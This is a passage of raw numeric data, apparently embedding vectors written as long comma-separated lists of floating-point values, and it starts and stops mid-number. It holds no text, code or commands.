0393,0.0019598282,0.007822415,0.024573239,0.0021086333,-0.031728446,-0.0070675174,-0.018655974,0.012884477,-0.011941828,-0.00021960527,-0.027677812,0.008293201,0.025612121,0.003840939,0.003057535,-0.0016487478,0.014306791,0.023406139,-0.01794662,0.018211294,0.028262734,0.041788872,0.0153258145,0.016662354,0.0020254839,0.03335145,-0.000030944677,-0.02124034,-0.052698955,0.009295761,0.016675994,-0.012207225,-0.0064566582,0.011874485,0.007459768,-0.016017597,0.011701083,0.022680225,0.024411038,-0.01623577,-0.008098044,0.022084892,-0.013495147,-0.014383928,-0.02082244,-0.00044139466,-0.0058837165,-0.009658723,0.011177237,-0.014693775,-0.011374156,0.0076863556,-0.000990991,0.007922072,-0.016399337,-0.0022727335,-0.021577222,-0.0023314673,0.007243701,0.010181409,-0.016169885,-0.006270193,0.005599987,0.02985141,0.0046781213,0.036131676,0.009691275,-0.011652909,0.019683307,-0.014035383,0.027330315,0.024260612,0.024017017,0.0011732822,0.013497878,-0.010079155,0.016951378,-0.0027143157,-0.025963204,0.002978345,-0.005257325,0.0022658193,-0.012030219,-0.0031974579,0.0029825533,0.0124896765,0.0042468226,0.026881222,0.0121681215,-0.0048278538,0.04829867,0.008273748,-0.02692689,-0.021538189,-0.012852776,-0.01951045,0.0042957556,0.013715617,-0.006590964,0.028562842,0.032300025,-0.021176407,0.0039268527,-0.0052377866,-0.014071131,0.017602878,-0.003934937,0.006844781,0.0034181955,-0.0075782575,0.0022866472,0.0029445346,-0.025309073,-0.015882023,0.012972868,0.0044171214,0.001959332,-0.021616207,0.0013241393,-0.010548088,-0.004936158,0.01952852,0.0012418356,-0.012743124,0.005764467,0.00050398486,0.0034660893,0.016001802,0.004262523,0.011295788,-0.005528171,-0.003419738,0.010718908,-0.0024053468,-0.011034797,-0.0036930484,-0.00041937266,-0.015582931,-0.008012188,0.02394755,-0.008589526,-0.008890982,0.013357567,0.0006124142,0.001164581,-0.016317813,0.016844014,-0.002975872,0.025737291,0.0142538715,-0.01301363,0.015996017,0.009422877,-0.004730941,-0.0024433425,0.014333456,0.021806281,0.0033576388,-0.0169739,-0.006625967,-0.023924774,-0.01938304,-0.004339595,-0.0063658506,-0.007881983,-0.008030825,0.00899365,-0.037908155,0.011594783,0.0057005864,0.015568837,-0.0027365226,0.013002515,0.012763459,-0.01759877,-0.0037390932,-0.02056773,-0.015061276,-0.008826449,0.01674274,-0.017539369,-0.02086204,0.0006362423,-0.010605932,0.03862149,-0.010436639,-0.031286947,-0.0027422688,0.005816441,0.0051648873,0.0020850892,0.004681499,0.016250914,0.006292494,-0.01892661,-0.011081646,0.001875458,-0.006919994,0.01153874,0.005149769,0.0060738116,0.022686997,-0.0001577904,-0.008150367,-0.011395015,0.03611537,-0.006973855,-0.004248573,0.017928965,0.009400802,0.01432549,-0.025198005,0.027861143,0.010595112,-0.019952213,-0.015086853,0.0013678372,0.000517685,-0.010105278,0.019962579,0.0066011064,0.034295555,-0.028796637,-0.019654792,0.0003609044,0.011965155,-0.01729192,-0.035603434,0.017514335,-0.02811738,0.0062842346,-0.0081457365,-0.0075864927,0.005689934,0.027747886,0.008013701,0.018118057,0.0017436809,0.008545936,0.0033303653,0.022050207,-0.0028719625,0.016461637,0.032880545,0.00303689,-0.0022208486,-0.010804587,-0.0031314706,0.00090364774,0.009043395,0.018768251,0.008563537,-0.0028775139,0.019140713,-0.028525624,0.014394883,-0.024462732,-0.013596191,-0.028413212,0.00486242,0.0010013229,-0.021932073,0.0117489975,-0.01163846,0.021475105,0.012706457,-0.013284993,0.017836208,-0.030088045,-0.0020869558,0.0010953492,0.0012774948,0.00215719,0.011699859,0.0006661929,0.014687023,-0.013823968,0.019937797,-0.0028662886,0.011018093,-0.004265219,-0.025221357,-0.014910427,0.015715273,0.009804977,-0.0028943755,-0.0067246817,-0.012071443,-0.011999604,0.013984296,0.0077926726,0.011854259,-0.0018291634,0.032558806,0.030149065,-0.02196546,-0.0005338948,-0.034335572,0.01126689,0.018958867,-0.00094742374,0.00079585065,0.017241977,0.010327499,-0.026629636,0.015193463,-0.011991444,0.014084391,0.008333772,0.012705016,-0.0051992186,0.0051682102,-0.027258758,-0.018281432,0.008438557,-0.015462938,-0.004009997,-0.027991237,0.010684617,-0.0060166493,-0.0028479164,0.039465033,-0.012716931,-0.00088010693,0.011246452,-0.040586084,-0.009530917,0.0058061723,0.01923562,0.004636596,0.021203803,0.03156266,0.0024857437,0.02309459,0.003023699,0.0046416046,-0.0024810103,-0.0011596413,0.0017548782,0.02213452,0.008836896,-0.0052757026,0.00006442991,-0.0044062533,0.0038297058,-0.006545249,-0.0019477654,0.0127212005,-0.010730441,0.029027391,-0.027372753,0.003115489,-0.012766806,0.017021073,-0.033282947,0.004256741,-0.006546372,-0.03992962,-0.0007228339,-0.017271126,-0.018424207,0.045125738,-0.026288006,0.009928536,-0.013189155,0.0026245585,-0.024914786,-0.02372107,-0.01299652,-0.0957214,-0.007546649,-0.004407249,0.005040611,0.022660902,0.00011379817,-0.008961485,-0.024381902,0.008761675,0.0016703072,0.0042168475,-0.015380896,-0.012064119,-0.0017533344,0.007547788,-0.038669672,-0.017732779,0.0013267434,0.00020447133,-0.016906964,-0.013529865,-0.0019466208,-0.029769896,-0.03486551,0.01242716,-0.012747592,-0.0055494807,-0.0078817,0.0099219,-0.0010724945,0.0077044675,-0.0040178257,0.0073723886,-0.0040013622,-0.01269961,0.0006380137,-0.0064883856,0.00062051736,-0.01288649,-0.019969596,-0.0026997833,0.0014812847,0.0023263604,0.013949012,-0.012070586,0.0045834566,-0.016738575,0.008858819,-0.001757525,0.0032204357,0.003933756,-0.0007206404,-0.020043453,0.010775072,0.014373073,0.012324712,0.008487037,-0.009623188,0.009724368,0.0060142404,0.0017999244,0.0027009216,0.012692034,-0.0110214045,-0.0024840164,0.004095577,0.00021889951,0.011734514,-0.008302934,-0.0065140924,0.00697414,-0.021998785,0.00081283087,-0.030426225,-0.039307315,-0.015191488,-0.00890928,-0.034040067,-0.020920945,0.0033660627,0.041271586,-0.0017533874,0.01107672,0.00837071,0.00078205817,-0.014639816,-0.0033536777,0.005592252,0.026105547,0.019508084,-0.008775685,0.00022532049,0.014469722,-0.00005925714,0.011274073,-0.004367923,-0.018752195,0.009101996,0.010091814,0.009811044,0.015837403,0.027797546,-0.008592444,0.011878836,-0.0248508,0.00750938,-0.01042392,-0.012771492,0.0035340253,-0.012262377,-0.0121178385,0.023889842,0.04518806,0.036157645,0.0014300754,0.014708504,-0.0035095853,0.044599332,0.010930626,-0.019225698,-0.009949819,-0.019481517,-0.013253279,0.04073998,0.011649869,-0.0134378625,0.006925709,-0.01192929,-0.030128904,0.011283396,-0.03437866,0.03314414,0.021214599,-0.002106122,0.0042830966,0.011682749,-0.01004182,0.019416686,0.010452063,0.004269605,-0.015016465,0.002773159,0.02453962,-0.009240674,-0.017075654,0.012081551,-0.011348199,0.0035553772,0.008435134,-0.02736995,-0.011450287,0.013817899,-0.0015497915,0.006880401,0.003996034,-0.00898887,0.0072392267,-0.0055625294,-0.014821283,-0.001054687,-0.0034401643,0.010546853,-0.0010773153,-0.013703738,-0.032728866,0.004755895,0.013344552,-0.015829556,-0.0041353893,-0.0025535123,-0.008669905,-0.016389862,0.0011794199,-0.010199733,-0.009888879,0.008197795,0.007254753,0.03860674,-0.0123937605,0.014331968,-0.00268344,-0.001016934,-0.0055375057,0.0037945132,0.007189466,-0.015144743,-0.007213197,0.0027022522,0.009762825,-0.0026838449,-0.0046125306,0.009641026,-0.021355083,-0.012220434,0.018178854,0.012210182,0.01297865,0.003494222,0.0007897473,0.011274171,-0.013593006,0.01733428,-0.012029031,-0.0097569935,0.043681227,0.006221199,-0.0025683383,0.01193697,-0.025404586,0.00053218164,-0.0075881123,0.008078311,0.021958098,0.105275795,-0.0024779625,-0.0057631964,-0.004182999,0.0028994125,-0.018188741,-0.00013189454,-0.008404798,0.0023374122,-0.009191357,0.030379487,-0.0142223835,0.026769852,-0.014176594,-0.0060554305,0.026080132,0.0051008095,-0.019510418,0.01026342,0.016751777,0.028629078,-0.019979486,-0.0168808,-0.055071786,-0.026948908,-0.045299713,0.015489034,0.0018817506,0.0072552264,0.040236313,0.0032264178,-0.005251726,0.02268031,0.009777216,-0.012274901,0.012345051,0.017124519,-0.026179278,-0.003915591,-0.009569238,0.008867136,-0.0051915925,0.0037664163,-0.021107437,-0.003794462,-0.016576277,0.00073820655,-0.010436771,-0.012681287,-0.0219518,-0.006290576,0.0052723656,0.0046549384,0.025233697,0.010042941,-0.024871076,0.009095895,0.0021509775,0.023173817,-0.02359824,-0.016345793,0.0007987273,-0.0011644864,-0.0065271095,0.01427132,0.012951976,-0.013942945,-0.0048464127,-0.0029095872,-0.012110993,0.02880571,0.006538882,0.000021638758,-0.00011749428,-0.0060313195,0.0150105795,-0.0017827455,-0.0027972923,0.010427219,-0.028051622,0.013794817,-0.005554836,0.008597591,0.0024006183,0.0019374867,-0.0014632549,-0.024385527,0.011799116,-0.0017191641,-0.021577597,-0.012252634,0.042837013,0.018490443,0.009689579,-0.016888592,0.0074579595,0.0044426336,0.008247427,-0.010447788,-0.028117225,-0.028519444,-0.02671475,0.00248158,0.002113852,0.020408468,0.006182496,0.007315701,0.031155776,-0.023383275,0.0020408167,0.008296336,0.032706704,-0.003298249,0.019926684,0.0006179905,0.025704635,-0.013803241,-0.006387155,0.011450919,-0.008114171,-0.009257907,0.011329538,0.0040852474,0.02193103,0.007874444,0.018043414,-0.0132929925,0.0019100024,0.0058893114,0.009002353,-0.008670455,-0.03434009,0.0052895136,0.0029092312,0.006096789,-0.015862545,0.023922719,0.0025330514,0.0056566335,0.0054554157,0.011127895,-0.0033429617,-0.00860416,-0.034715064,0.021009743,-0.03548377,0.0067370436,-0.007823075,0.0028636504,0.015901176,0.009385268,0.005670851,-0.007682758,0.0029905888,-0.006817423,0.0034409156,-0.017109929,-0.0024469767,-0.0067320294,-0.012471838,0.017136708,-0.002328624,0.012396887,-0.044357866,0.047378726,0.013516649,0.021522349,0.003176806,0.007242623,0.0035509241,-0.02307769,0.008611639,0.0036092934,-0.011832477,0.00037662018,0.015392283,0.009005661,0.00052097434,-0.012271272,-0.009705023,0.0183896,0.008583533,0.007424153,-0.01931197,0.011070665,-0.005147368,0.016485987,0.0023107883,-0.00036796439,0.020265292,0.0046714335,-0.004063454,-0.0010124728,0.009564489,-0.0031464077,0.0035497565,-0.019292207,0.04048789,-0.017024435,-0.025187777,-0.0009399221,-0.015404631,0.020410767,-0.015291536,0.009923659,-0.017742572,-0.014894942,-0.005778466,-0.0045984304,0.0054877726,0.01007575,-0.0007090814,-0.0056566983,-0.026074486,0.015894324,0.0062575466,-0.012818019,-0.019371103,-0.02316189,0.02313475,0.013295444,0.001059205,-0.0062499424,0.012068399,0.012537266,0.004462672,0.005242477,0.005314568,0.008213278,-0.011097036,-0.018984586,0.004775442,0.011316107,0.0039398842,-0.0023107608,-0.0039563053,0.016673781,0.017447589,0.015604993,-0.015934912,-0.018361725,0.017442135,0.014285052,0.014078768,-0.025794707,-0.0051055746,-0.023267189,-0.027549127,0.011021234,-0.014941655,-0.021242855,0.0017222128,-0.0073025636,0.0007187268,-0.041243512,-0.01466161,-0.0019670613,0.01954781,0.013975778,-0.01647042,0.023860438,0.027837148,-0.007948167,0.021174582,-0.008246396,-0.022874376,0.016332582,-0.006860926,-0.0018968764,-0.0020885211,-0.0059769833,0.02442532,-0.012997073,0.023643248,0.023301808,-0.0062698596,0.008319204,0.0054248604,0.007292527,-0.015979586,0.028703598,-0.0011902575,-0.004181511,-0.005434998,0.002071979,-0.0022386669,-0.0021453532,0.009570074,0.03569533,-0.056796324,-0.008230572,0.022012584,0.0037983854,-0.02721554,0.017796524,-0.005589003,-0.02144646,-0.019995889,0.00612149,0.0073073776,-0.0070621767,-0.03567445,-0.0069929278,0.013663594,-0.017885033,-0.013422459,0.029567277,0.003958028,-0.009710633,0.026234925,-0.010210912,0.0028389746,-0.015910791,0.017048378,0.025000801,-0.0029259452,0.018792234,0.016043745,0.021714766,-0.01856979,0.02398721,-0.013908854,0.00024404083,0.0160782,-0.0016383278,0.009509674,-0.0032306358,-0.029223477,-0.02434025,-0.01668303,-0.014033276,-0.00720986,0.03512523,-0.0037665097,-0.012387523,0.023260538,-0.0039016232,0.11286716,-0.025470072,-0.024170598,0.027822364,-0.015654344,0.0012356987,0.009876211,0.027503403,0.0073204166,0.0036374528,-0.0033597571,-0.017089175,0.017172778,0.02015816,-0.006589556,-0.011844784,0.030268513,0.12105911,-0.0007183497,0.038616654,0.015196867,0.0027579397,-0.0005739901,0.0017814197,0.010545524,-0.084539205,-0.014735201,-0.029980063,0.01329647,-0.011089169,-0.038040232,0.017912196,0.014676788,-0.0033403835,-0.010714511,0.027224213,0.0007234626,-0.018038722,-0.012917812,-0.023755236,-0.007955405,-0.004388116,-0.009113713,-0.0020746286,-0.011157324,0.014735712,-0.032406796,0.0057815425,-0.0017337098,0.021199802,-0.0076929205,-0.021545276,0.019689234,-0.0021724065,0.008236329,-0.008469048,0.004473168,-0.016826764,-0.010067583,0.0093947025,-0.021063065,0.0092348205,-0.0016330025,0.028664527,0.005168102,-0.020489497,-0.00429112,0.013436676,-0.0000363213,0.005600161,0.029177783,0.021671126,-0.03180256,-0.0055862,0.021052547,-0.012093916,-0.010300817,-0.0036759959,0.0044587823,0.008217217,0.027941978,0.0016427966,-0.008859105,0.021729454,0.016843883,0.042835798,-0.0021547342,0.001702013,0.02191,-0.0061137145,0.009637759,0.0075521986,-0.015227066,-0.011341398,0.002926253,0.02575878,0.0028170461,-0.008200461,0.0053810575,-0.014930839,-0.011335859,0.02736487,0.005627319,0.0039816527,0.005801087,0.001961819,-0.00049209397,-0.021931706,-0.0006985984,0.008525509,0.015293157,0.0010320704,0.002955149,0.014714557,-0.0067656874,-0.005549292,0.0030963765,-0.008863918,-0.022974445,0.016995154,0.01331936,0.009436895,0.0017083263,-0.004838779,-0.0054280926,-0.0025428717,0.016664442,0.012000307,-0.014898969,0.0036900616,-0.022091137,0.015390158,0.020335654,0.040349443,-0.008822936,-0.017495217,0.019992461,-0.026868833,-0.038739488,0.0016873762,-0.0024569873,-0.011223319,-0.008272079,0.009520722,-0.0046977247,-0.010287097,0.017579524,-0.009964782],[0.012598519,-0.010704139,-0.027130198,-0.009778248,0.014595236,-0.03450679,-0.011748991,-0.016502762,-0.013381842,-0.016019115,-0.009037696,0.017398981,-0.013829869,-0.016041836,-0.028600505,0.009806297,0.010527982,-0.000620895,-0.0102243805,-0.00025718796,0.015161162,-0.0016809582,-0.0011578664,-0.018970203,0.00426091,0.008171962,0.01535009,-0.002359378,-0.0057780086,0.0037751822,-0.0172629,0.025887858,0.012467785,-0.0071050115,0.009640877,-0.0024066314,-0.0042784843,-0.009926155,0.0022068517,0.0022811536,-0.0115361465,0.0035072754,0.011382359,0.015124757,-0.028055793,-0.0038770842,-0.0049308804,0.022951785,-0.017076157,-0.0045491075,0.027125569,-0.025804352,-0.015551174,0.0026725135,-0.0039169434,0.007498442,0.00042194832,-0.023001648,0.017003717,-0.00020645314,-0.019333685,0.030795228,-0.017131342,-0.018393857,0.018789073,-0.03526617,0.011890448,-0.015667183,-0.009104472,-0.02336274,0.0077324817,0.0047840234,-0.0018058968,0.04230071,-0.0034824165,0.01702965,-0.008608137,-0.029557105,-0.011338811,-0.0018581385,-0.03816361,-0.0051318477,0.005515682,0.0032065797,-0.018940946,-0.0034339156,0.01301442,-0.008067985,-0.023766275,-0.015869075,-0.017565856,-0.008029482,-0.0026871825,0.004600022,-0.050222196,0.0073018284,0.040756308,-0.0021799975,0.014784304,-0.0036245498,-0.027455145,-0.0050827847,-0.015331813,-0.00031281536,0.0046267267,-0.006635748,0.0102100205,-0.018415175,-0.006480798,-0.02665687,0.0014506743,-0.0051883454,0.00021801851,-0.00029771795,0.023857031,-0.006492051,-0.001523769,0.020362861,-0.021403505,-0.010677481,-0.008468343,0.022210324,0.034387115,0.008193008,0.013365116,-0.017271757,-0.0071712728,0.011941326,0.0003761302,0.0068233833,-0.0029301425,0.0040955706,-0.0063986694,-0.005543857,0.0035145655,0.0012050266,-0.009511264,-0.0074060196,0.004458266,-0.019431325,0.015561367,-0.030024521,0.006441906,0.027799506,0.012452012,0.03134015,-0.0081989905,0.0324085,0.016957195,0.015010669,0.008740367,0.002334105,0.015913287,-0.012992632,-0.0029034894,0.027498322,0.0210271,-0.0018002903,-0.008584844,0.03132735,-0.025393782,-0.020073947,0.026763199,-0.013890909,0.0064571667,-0.02894246,0.009809036,-0.008892259,-0.037966996,-0.021562267,0.01389757,0.019805433,0.0057215407,0.02380739,0.00079305563,0.030373167,-0.012313858,-0.014777587,-0.010618165,0.0029939527,0.0009832295,0.021331599,0.0293633,0.019214423,0.015697643,-0.004917094,0.015386256,-0.0018001427,-0.009987787,-0.00019138934,-0.017373528,-0.018719746,0.0016780125,-0.0076316656,-0.0086817425,-0.005812952,-0.00862002,0.056831367,0.011931892,0.003557112,-0.0066629,-0.009883374,-0.00430834,-0.01961922,-0.0075492067,-0.018640975,-0.00915769,-0.007305209,-0.008791661,0.014564705,-0.01968851,-0.001241154,-0.018012837,-0.0023835618,0.0026962133,-0.056389276,-0.01231508,0.03441564,0.0032401371,0.012701873,-0.024554243,0.0020247477,0.0014421272,-0.023140877,0.004509766,-0.03146434,0.0030040492,0.0076187956,0.02595139,-0.018764876,0.026710693,-0.0010258659,-0.016165523,-0.03792823,-0.0006927241,-0.004595386,0.008005876,-0.0030412565,0.010797233,-0.0083306795,0.005947679,0.009825737,0.036253557,0.03153665,-0.009276531,-0.008772348,0.015833586,0.0054509607,0.0024397974,0.006799339,0.024173768,0.012552008,0.0021465824,-0.0073192017,-0.011503826,-0.0063059167,-0.006686171,-0.0122241825,0.011861475,0.04084153,0.014524348,0.03153675,0.0026057847,0.021006264,0.02263269,0.011040159,0.00060810795,-0.03558659,-0.009962898,-0.0044552074,-0.0314522,0.015173815,-0.008996609,0.013824127,0.0013253877,-0.0012069867,0.006613528,-0.0037799317,0.020365536,0.017224431,-0.0010940465,0.009301551,-0.0017560392,0.00031608687,-0.0016901823,0.0100850295,0.001139729,0.0005014831,0.030862335,-0.00878522,-0.02079674,-0.00085596443,0.026294768,0.028629277,-0.021767518,-0.0058373623,-0.0110239005,0.02275899,-0.0003769663,-0.0033647993,0.0062861014,-0.02499877,0.02474224,0.021250106,-0.015033207,0.00180822,0.0259747,0.044201855,-0.02392532,0.006908918,-0.002091355,0.021010807,-0.014801639,-0.016879756,0.016101485,0.006574471,-0.006414289,-0.01215109,-0.0151746245,-0.0027194882,0.022880994,-0.029342126,0.014632962,-0.02353539,-0.018520897,-0.0046816496,0.016205832,0.004774155,-0.0026770683,0.009106463,0.017955497,0.0038859327,0.0075916667,0.031633925,-0.003984844,0.015879301,-0.011545997,0.015026052,0.0056403102,-0.0016864049,-0.011650199,-0.009150323,0.005006013,0.010555945,-0.00018409106,-0.0124178585,-0.01762521,0.009626796,0.001460325,0.019952768,0.019452715,0.006817329,-0.013802342,0.017599067,-0.037173975,0.022338329,-0.019173926,-0.0025379057,0.004977311,-0.0090515595,-0.00045836874,-0.012041511,-0.011191885,0.013421183,0.05103074,0.01507938,-0.011206968,0.018902978,-0.03589702,-0.015430208,0.008528816,0.01861686,0.018861024,-0.010604166,-0.0224282,-0.018058557,0.0008547862,0.0076497355,-0.014310401,-0.009238556,-0.041389715,-0.0038853525,-0.030382158,-0.030176595,0.018208984,-0.005596445,-0.022474205,0.0078121927,0.012139265,-0.0007188386,0.0073668356,-0.0111350445,0.011567076,-0.020756371,-0.010723439,0.0016955005,0.0061901947,-0.003195401,-0.03574331,0.010819928,-0.013605281,0.014212919,-0.016946707,-0.025869325,-0.007944711,0.008671211,-0.0027203881,-0.019488584,-0.018001163,0.0237559,0.005318683,-0.0053924336,0.00396293,0.0018411692,-0.0130190635,0.046386473,-0.015120513,0.026397651,-0.015234735,0.0037569401,0.030473445,-0.019797435,0.022874186,0.016713273,0.036846466,0.016193056,-0.013838748,0.013764686,0.009479134,0.021818997,-0.004175775,0.010036832,-0.018491328,-0.0019642378,0.0065069557,0.0008410856,-0.011068822,0.00074233435,-0.0040302086,0.012036193,0.010160894,-0.004180724,-0.00806645,-0.0033247704,-0.030645937,0.04420584,0.011575075,-0.027137559,-0.00088449166,-0.004114707,0.007259678,0.026761182,0.01190241,0.00454676,-0.003508398,0.0032197747,-0.0020783292,0.00409771,0.010744593,-0.010749011,0.026057512,0.020593306,0.008910462,-0.0054524764,0.005934329,-0.010326779,0.01058614,-0.010592292,-0.015624197,0.01228661,-0.013625475,-0.012805637,0.008734107,0.016896283,-0.016398279,-0.0070837024,0.011585953,-0.010485818,0.009513646,-0.009770241,-0.008873544,0.0034636399,0.010033586,0.0037293269,0.026816327,0.004340778,0.017971946,-0.0110711185,-0.012371371,0.012701299,-0.0021401774,-0.0049647177,-0.012614338,0.037833948,-0.0047538225,0.01840673,0.008838579,-0.04796362,0.0030273646,0.02059226,-0.004602288,-0.02142042,0.03187985,-0.0022925884,0.017405482,0.01240255,0.034501754,-0.0048526456,0.012481682,0.000022802353,0.033308983,-0.002578622,-0.010475374,-0.005546737,-0.008925496,-0.001326765,0.0062892083,-0.0011935751,-0.009374842,0.018190796,0.019142529,0.020846864,-0.022038419,-0.0013862966,0.024361996,-0.035279855,0.018133974,0.0343897,0.00046306153,0.041478317,-0.00054983725,0.05215942,-0.0049190354,-0.004932527,-0.003110767,0.008299843,0.018004619,-0.0059928596,0.0182499,-0.021779785,0.0089813415,-0.012876772,0.0047821784,0.0043619415,0.008135401,-0.0022806565,0.008999001,0.005007783,0.015995942,-0.008294993,0.005838883,-0.016450549,-0.002873291,-0.025230277,-0.025954017,-0.018440878,0.0017488454,0.03291281,-0.005478652,-0.013766435,-0.03013514,0.009773532,0.0019317486,0.014817006,-0.008465854,0.031994965,-0.013130403,0.048083443,-0.034114268,-0.007141137,0.018008012,-0.0043626484,-0.027266338,0.031507596,-0.008585093,-0.00090459833,-0.015486686,0.004782376,-0.0011957241,0.03297973,0.0083701685,-0.00036826628,0.012526479,0.0099024335,0.018285468,-0.023628073,0.0045173024,0.017986726,0.0055778166,-0.009784844,-0.0050075087,-0.0022591557,0.015701255,0.0013602109,-0.0073575405,-0.005007451,-0.0063629574,-0.018312227,-0.0018632518,-0.0031306776,-0.044555787,-0.007180755,0.0036469426,-0.005736629,-0.0031816051,0.01292796,-0.026324518,-0.024576511,0.010951048,0.00017515903,-0.015599184,0.011074527,-0.015718557,-0.011661272,-0.010563503,0.008551715,0.005824787,0.00235267,-0.0045003635,-0.0014272686,-0.016630622,0.0028316418,-0.00081252505,0.014038965,0.036014106,0.010605743,0.006569765,-0.024012847,-0.041481048,-0.013173866,0.028774394,-0.025257189,0.014152501,0.021980723,0.022583894,-0.00092666777,-0.0059459894,0.0014615008,0.007883952,-0.02220541,0.0069123553,-0.0010986835,-0.06470729,-0.0071510333,-0.0036628048,-0.00078043406,0.010471676,0.046342187,0.007926411,0.0047186418,0.011411228,-0.0037585897,0.000021131804,0.01782254,-0.019632678,0.020805549,0.0010819962,-0.021439934,-0.029474312,-0.01300985,-0.01115843,-0.018405505,0.0067767296,0.016958933,-0.004266678,0.005480519,-0.0023624282,-0.005771358,-0.020095676,0.0052260305,-0.0007795707,-0.025439925,-0.006895984,-0.014188246,-0.017776,0.00093456404,-0.0058676926,-0.000068823356,0.0046509127,-0.0044002365,-0.011293951,0.00424987,0.0030315553,-0.0151554,-0.011715315,0.008695431,-0.014930395,0.03931043,-0.01704342,-0.0053692213,0.016911738,0.028276173,0.02171582,0.015539451,-0.0020334958,0.004861269,-0.025980918,0.011859202,-0.02858986,0.029436417,0.007357144,0.016429536,-0.007918449,0.013581674,0.010530686,-0.01781992,-0.00075672654,0.0130323665,0.016727041,0.019117229,0.0075966655,0.0056041316,0.034400363,0.019183496,0.021623837,0.010667351,0.0099591715,0.010063518,0.0043340498,0.007159441,0.0027124016,-0.005226759,-0.012819209,-0.02354668,-0.022248013,0.027953006,0.004359688,0.0069933855,-0.025617432,0.0059954743,-0.0010628673,0.0056020976,0.00025238257,-0.0030730432,-0.017632503,-0.0059839212,-0.012025678,-0.0023082395,-0.00094049546,-0.028491521,0.004818337,0.0049444535,0.026665036,-0.013039919,-0.0016304723,-0.00070214324,0.019869091,-0.0048131836,-0.020513805,-0.021942012,-0.018212967,0.030952219,-0.016137041,-0.012589968,-0.0030333733,0.0051917126,-0.011173135,0.02722424,-0.007947041,0.0032939918,0.00046170832,-0.018052777,0.007840995,0.005504484,0.014034458,0.012935403,-0.033932924,0.004594381,-0.004799313,-0.0042800545,0.0036897461,-0.0117317615,0.007836675,0.009266773,-0.004858381,-0.0055667325,-0.032332264,-0.00931065,-0.009729415,-0.0020690523,0.0058803502,-0.015064826,0.031621464,-0.018835552,0.035605244,0.0012627682,0.030279962,0.01911233,-0.015779521,0.024238078,-0.011446888,0.006197468,-0.005053765,0.018566536,-0.008774698,-0.038999032,0.00385045,0.01986997,-0.019099742,-0.010323777,0.002297646,-0.018112946,-0.006695517,-0.027075963,0.013774284,-0.032495275,0.011467329,0.007152142,-0.004743131,0.011399801,0.006253778,0.018002678,0.005524133,-0.013032484,0.020666601,-0.024733245,-0.002648099,-0.040224608,-0.03653161,0.008248525,-0.018830301,0.022664009,0.020741949,-0.019058036,-0.059121236,-0.0058236807,-0.003502312,-0.006063735,-0.0058299876,0.005304783,0.014971506,-0.014795548,0.023413708,0.01691438,-0.0069631482,-0.018318009,0.0070695006,0.004514579,-0.008956565,0.0058454797,0.028281752,-0.0008225181,-0.003434663,0.003007679,-0.009957936,0.004447354,-0.021733368,0.016420614,-0.020471929,0.013736005,-0.00070830964,0.011509947,0.019628584,-0.009481123,0.0013452489,0.0075280983,0.0142346,0.0032414189,-0.0023660664,-0.04719837,-0.008971797,0.0070450576,-0.01754363,-0.03159077,-0.01188102,0.0040173884,-0.0015905711,-0.0037519548,0.024277298,0.019896371,0.01029631,-0.00677636,0.0037754348,0.0050894776,-0.014478737,-0.015854686,-0.022156324,-0.006178856,0.00035694678,-0.008190137,0.014806245,0.0058417604,0.013462174,-0.007798759,-0.002394883,0.0137716,-0.0030255842,-0.0043697264,0.0048906016,0.004128833,-0.0064156363,-0.0030798404,-0.00052507693,-0.024936097,-0.004142857,-0.0019721473,0.0044223666,0.018906692,0.0031235318,0.019038007,-0.029501082,-0.008700826,0.011962922,-0.011464682,0.024999194,-0.018167285,0.0069666514,-0.009447639,0.016262237,0.037221733,-0.0018282012,0.010649257,-0.0051300363,0.01701056,0.026711376,0.0006138958,-0.0024678842,0.0017984614,0.006993784,0.016893849,-0.012943925,-0.020417824,0.0031177595,0.025363553,0.0295283,-0.020783758,-0.0027669985,-0.0031471057,-0.01780613,0.0024181807,-0.0021564413,0.0011663343,-0.02146759,-0.0010540533,0.017269326,-0.026617609,0.0011951141,-0.022901325,-0.075359285,0.01602586,-0.014139228,-0.015912129,-0.0013438716,0.002947547,0.020009577,-0.011945848,0.023324184,-0.015758974,-0.0017039455,-0.016889377,0.008536281,0.0006722104,-0.013759924,-0.027099075,-0.028904812,0.0028731113,0.03429311,0.015932838,-0.010453257,0.0023855474,0.0106748035,0.0039762123,0.027795779,0.01246502,0.0045762137,0.00044150263,-0.019438904,-0.024003014,-0.00572499,0.0040652724,-0.005531832,-0.0052577164,-0.0003580424,-0.023964781,0.00034298256,0.018452661,-0.0006066183,-0.01189381,-0.010557964,-0.014505956,-0.010031835,0.025119208,0.005086197,-0.013958295,-0.0001258906,-0.01704147,0.008007637,-0.013152592,0.01209086,-0.0075092865,-0.0062539447,0.0072730323,-0.0316898,0.026732525,-0.015050093,0.018196747,-0.004885262,0.013720875,-0.014161738,-0.014761796,0.02050755,0.019494688,-0.01830691,-0.024804909,-0.016958058,0.031998515,-0.0064291386,0.0009425867,0.0008830523,-0.0018065105,0.0032729215,0.0035253805,-0.031360824,0.022387581,-0.033480745,-0.0045817895,-0.006248429,-0.024289127,-0.020230882,0.016167698,-0.006194311,0.0033107314,-0.0012299812,0.03364045,0.0040677916,0.0014647489,0.0026015132,0.001871702,-0.023049222,0.00586437,-0.0055983765,0.019507619,0.014497468,0.021208243,0.016983444,0.021728747,-0.0020370297,-0.0064972467,0.038878772,0.0127971545,-0.024885003,0.043616995,-0.013297133,0.00073167146,0.038876735,0.011534337,0.013974713,0.019421708,-0.016226472,-0.012984751,0.003978055,0.01065929,-0.016952032,0.00784095,0.005146515,0.02739067,0.03820159,0.012887233,-0.0005791179,-0.0053924792,0.00097287697,0.004022697,0.009494171,-0.0021405907,0.0057797995,0.010904712,-0.026944155,0.01243333,-0.0005860746,-0.00813257,-0.016912658,-0.00185777,0.027112065,-0.0043144836,-0.012038325,-0.016187007,-0.01750214,0.002993199,-0.017121822,-0.007133534,-0.009652952,-0.0036141942,0.022011474,-0.00024407794,-0.023230588,0.02306285,0.0044291546,0.018832149,-0.014426303,0.015629023,-0.0040637753,0.002733762,0.007450452,0.018316709,-0.008490205,-0.031256672,0.0076322085,0.0072742184,-0.011858146,-0.011975772,0.00542921,-0.000974733,-0.04395414,-0.0036947532,-0.008365183,-0.009231903,-0.028168965,-0.011735783,-0.013190693,0.010608451,0.013658894,0.023144925,-0.001952632,-0.02183077,-0.0030858987,0.0024602208,0.01695149,-0.00056246755,0.0006601022,0.03671318,0.01986006,0.007349342,0.0030536363,-0.026322093,-0.010507804,-0.015500455,-0.011373028,-0.0057600364,-0.0041208225,-0.013966897,0.011573749,-0.00018506062,-0.016873816,0.031941812,0.014883817,0.030385409,-0.0043191244,0.011347001,0.011545776,0.0034200002,0.0059425808,-0.013889687,-0.04796353,0